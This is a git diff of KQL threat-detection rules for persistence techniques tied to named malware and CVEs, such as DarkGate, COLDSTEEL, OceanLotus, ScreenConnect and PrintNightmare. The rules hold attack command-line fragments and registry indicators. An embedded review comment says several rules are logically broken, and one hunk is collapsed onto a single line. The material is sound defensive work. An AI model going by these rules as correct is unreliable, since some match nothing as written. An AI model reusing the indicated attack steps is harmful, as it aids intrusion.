RegistryValueData contains ".vbs" or RegistryValueData contains "C:") and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Ports" \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
index 8a984262..34569775 100644
--- a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
+++ b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
@@ -1,12 +1,12 @@
-// Title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
-// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
-// Date: 2024-02-21
-// Level: medium
-// Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, cve.2024-1708, detection.emerging-threats
-// False Positives:
-// - This will occur legitimately as well and will result in some benign activity.
-
-DeviceFileEvents
+// Title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
+// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
+// Date: 2024-02-21
+// Level: medium
+// Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, cve.2024-1708, detection.emerging-threats
+// False Positives:
+// - This will occur legitimately as well and will result in some benign activity.
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and ((FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".ashx") or (FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".aspx"))) and (not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql b/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql
index e8f35600..34c15e9f 100644
--- a/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql
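Review bot: The exclusion `not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*")` is dead: `=~` is case-insensitive string equality, `*` has no wildcard meaning in KQL, and `\*` is not a documented escape in a plain string literal, so the clause either fails to parse or never excludes anything and the rule fires on files in App_Extensions subdirectories too, contradicting the "within the root of the App_Extensions directory" description. The intended filter is expressible as `and not(FolderPath matches regex @"(?i)ScreenConnect\\App_Extensions\\[^\\]+\\")`. The same literal-`*` carry-over appears in the OceanLotus hunk (`RegistryKey endswith "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a*"` and siblings) and the Outlook hunk (`RegistryKey endswith "\\Tasks*"`, `"\\Notes*"`, `"\\SOFTWARE\\Microsoft\\Office*"`, `"\\Outlook*"`), where `endswith "x*"` only matches keys literally ending in an asterisk; those should become `contains`, and in the Outlook rule the two `endswith` conjuncts can never both hold as written, so that rule currently matches nothing.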
+++ b/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: DarkGate - User Created Via Net.EXE -// Author: X__Junior (Nextron Systems) -// Date: 2023-08-27 -// Level: high -// Description: Detects creation of local users via the net.exe command with the name of "DarkGate" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1136.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: DarkGate - User Created Via Net.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-27 +// Level: high +// Description: Detects creation of local users via the net.exe command with the name of "DarkGate" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "DarkGate" and ProcessCommandLine contains "SafeMode") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql b/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql index 3b05056b..ea8f29ac 100644 --- a/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql +++ b/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql 
@@ -1,10 +1,10 @@ -// Title: Exploiting SetupComplete.cmd CVE-2019-1378 -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019-11-15 -// Level: high -// Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.execution, attack.t1059.003, attack.t1574, cve.2019-1378, detection.emerging-threats - -DeviceProcessEvents +// Title: Exploiting SetupComplete.cmd CVE-2019-1378 +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-11-15 +// Level: high +// Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.execution, attack.t1059.003, attack.t1574, cve.2019-1378, detection.emerging-threats + +DeviceProcessEvents | where ((InitiatingProcessCommandLine contains "\\cmd.exe" and InitiatingProcessCommandLine contains "/c" and InitiatingProcessCommandLine contains "C:\\Windows\\Setup\\Scripts\\") and (InitiatingProcessCommandLine endswith "SetupComplete.cmd" or InitiatingProcessCommandLine endswith "PartnerSetupComplete.cmd")) and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\Setup\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql index 6e7e53bd..01d34437 100644 
--- a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql +++ b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql @@ -1,11 +1,11 @@ -// Title: Kapeka Backdoor Configuration Persistence -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-07-03 -// Level: medium -// Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. -// The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats - -DeviceRegistryEvents +// Title: Kapeka Backdoor Configuration Persistence +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: medium +// Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. +// The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats + +DeviceRegistryEvents | where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\{" and RegistryKey endswith "\\Seed") and (not(RegistryValueData contains "(Empty)")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql b/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql index d4cf62d1..f7bf0450 100644 --- a/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql +++ b/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql 
@@ -1,10 +1,10 @@
-// Title: Moriya Rootkit File Created
-// Author: Bhabesh Raj
-// Date: 2021-05-06
-// Level: critical
-// Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Moriya Rootkit File Created
+// Author: Bhabesh Raj
+// Date: 2021-05-06
+// Level: critical
+// Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath =~ "C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql b/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql
index c645af9b..4a349ff4 100644
--- a/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql
+++ b/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql
@@ -1,10 +1,10 @@
-// Title: OceanLotus Registry Activity
-// Author: megan201296, Jonhnathan Ribeiro
-// Date: 2019-04-14
-// Level: critical
-// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: OceanLotus Registry Activity
+// Author: megan201296, Jonhnathan Ribeiro
+// Date: 2019-04-14
+// Level: critical
+// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey endswith "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a*" or RegistryKey endswith "Classes\\AppX3bbba44c6cae4d9695755183472171e2*" or RegistryKey endswith "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}*" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey endswith "\\SOFTWARE\\App*" and ((RegistryKey endswith "AppXbf13d4ea2945444d8b13e2121cb6b663*" or RegistryKey endswith "AppX70162486c7554f7f80f481985d67586d*" or RegistryKey endswith "AppX37cc7fdccd644b4f85f4b22d5a3f105a*") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql b/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql
index 0d6c789b..b80bf182 100644
--- a/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql
+++ b/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql
@@ -1,12 +1,12 @@
-// Title: Outlook Task/Note Reminder Received
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-05
-// Level: low
-// Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137, cve.2023-23397, detection.emerging-threats
-// False Positives:
-// - Legitimate reminders received for a task or a note will also trigger this rule.
-
-DeviceRegistryEvents
+// Title: Outlook Task/Note Reminder Received
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-05
+// Level: low
+// Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137, cve.2023-23397, detection.emerging-threats
+// False Positives:
+// - Legitimate reminders received for a task or a note will also trigger this rule.
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Tasks*" or RegistryKey endswith "\\Notes*") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook*")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql
index a8a4410a..3f5da515 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql
@@ -1,10 +1,10 @@
-// Title: Potential BearLPE Exploitation
-// Author: Olaf Hartong
-// Date: 2019-05-22
-// Level: high
-// Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, car.2013-08-001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential BearLPE Exploitation
+// Author: Olaf Hartong
+// Date: 2019-05-22
+// Level: high
+// Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, car.2013-08-001, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/RP") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql
index 05ec713c..cb9cc6c3 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql
@@ -1,10 +1,10 @@
-// Title: Potential COLDSTEEL Persistence Service DLL Creation
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-04-30
-// Level: high
-// Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential COLDSTEEL Persistence Service DLL Creation
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
index 3d759b47..5053c50b 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
@@ -1,12 +1,12 @@
-// Title: Potential COLDSTEEL Persistence Service DLL Load
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-02
-// Level: high
-// Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential COLDSTEEL Persistence Service DLL Load
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-02
+// Level: high
+// Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql
index 7a667ab9..e899daa3 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql
@@ -1,10 +1,10 @@
-// Title: Potential COLDSTEEL RAT File Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-30
-// Level: high
-// Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential COLDSTEEL RAT File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath =~ "C:\\users\\public\\Documents\\dllhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql
index 36902f6b..1d27b967 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql
@@ -1,10 +1,10 @@
-// Title: Potential COLDSTEEL RAT Windows User Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-02
-// Level: high
-// Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Potential COLDSTEEL RAT Windows User Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-02
+// Level: high
+// Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "ANONYMOUS" or RegistryValueData contains "_DomainUser_") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-" and RegistryKey contains "\\ProfileImagePath")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
index 2cf6fc66..7b0f4745 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
@@ -1,10 +1,10 @@
-// Title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
-// Author: Gregory
-// Date: 2023-10-11
-// Level: high
-// Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.001, cve.2023-27363, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
+// Author: Gregory
+// Date: 2023-10-11
+// Level: high
+// Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.001, cve.2023-27363, detection.emerging-threats
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\FoxitPDFReader.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" and FolderPath endswith ".hta"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql
index 4fe9a997..4556f6f1 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql
@@ -1,10 +1,10 @@
-// Title: Potential CVE-2023-36884 Exploitation Dropped File
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2023-07-13
-// Level: medium
-// Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, cve.2023-36884, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential CVE-2023-36884 Exploitation Dropped File
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, cve.2023-36884, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" and FolderPath endswith "\\file001.url" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql b/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql
index 56c86dbc..1df0b250 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql
@@ -1,12 +1,12 @@
-// Title: Potential Encrypted Registry Blob Related To SNAKE Malware
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-10
-// Level: medium
-// Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, detection.emerging-threats
-// False Positives:
-// - Some additional tuning might be required to tune out legitimate processes that write to this key by default
-
-DeviceRegistryEvents
+// Title: Potential Encrypted Registry Blob Related To SNAKE Malware
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: medium
+// Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+// False Positives:
+// - Some additional tuning might be required to tune out legitimate processes that write to this key by default
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds*" and (not((RegistryKey endswith ".AssocFile.WAV" or RegistryKey contains ".wav.")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
index 6fbff8d4..697c24cb 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
@@ -1,11 +1,11 @@
-// Title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2024-03-22
-// Level: medium
-// Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command.
-// This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-03-22
+// Level: medium
+// Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command.
+// This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "shutdown /l /f" and ProcessCommandLine contains "WEEKLY") and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql b/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql
index 7ed90560..26388339 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql
@@ -1,10 +1,10 @@
-// Title: Potential NetWire RAT Activity - Registry
-// Author: Christopher Peacock
-// Date: 2021-10-07
-// Level: high
-// Description: Detects registry keys related to NetWire RAT
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Potential NetWire RAT Activity - Registry
+// Author: Christopher Peacock
+// Date: 2021-10-07
+// Level: high
+// Description: Detects registry keys related to NetWire RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\software\\NetWire"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
index 606fce61..49dd5d56 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
@@ -1,12 +1,12 @@
-// Title: Potential Notepad++ CVE-2025-49144 Exploitation
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-06-26
-// Level: high
-// Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path.
-// This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer.
-// The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Notepad++ CVE-2025-49144 Exploitation
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-26
+// Level: high
+// Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path.
+// This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer.
+// The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\contextMenu\\NppShell.dll" and ProcessCommandLine startswith "regsvr32 /s" and FolderPath endswith "\\regsvr32.exe") and (not((FolderPath in~ ("C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql
index 127ba1e2..9a97d582 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql
@@ -1,10 +1,10 @@
-// Title: Potential PrintNightmare Exploitation Attempt
-// Author: Bhabesh Raj
-// Date: 2021-07-01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential PrintNightmare Exploitation Attempt
